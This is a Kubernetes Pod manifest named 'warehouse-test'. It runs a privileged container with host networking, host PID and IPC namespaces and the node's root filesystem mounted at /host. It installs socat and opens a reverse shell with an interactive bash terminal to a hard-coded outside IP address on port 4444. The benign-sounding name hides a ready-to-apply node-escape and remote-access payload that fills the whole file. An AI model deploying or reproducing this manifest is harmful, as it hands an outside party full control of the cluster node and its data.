apiVersion: v1
kind: Pod
metadata:
  name: warehouse-test
  namespace: default
  labels:
    app: warehouse-test
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  restartPolicy: Never
  containers:
    - name: warehouse-test
      image: ubuntu:latest
      command: ["/bin/bash", "-c", "--"]
      args:
        - |
          # Install socat
          apt-get update && apt-get install -y socat && \
          # Create and execute the reverse shell
          socat TCP:89.116.28.189:4444 EXEC:/bin/bash,pty
      securityContext:
        privileged: true  # Set to false unless needed
      tty: true
      stdin: true
      volumeMounts:
        - mountPath: /host
          name: noderoot
  volumes:
    - name: noderoot
      hostPath:
        path: /        
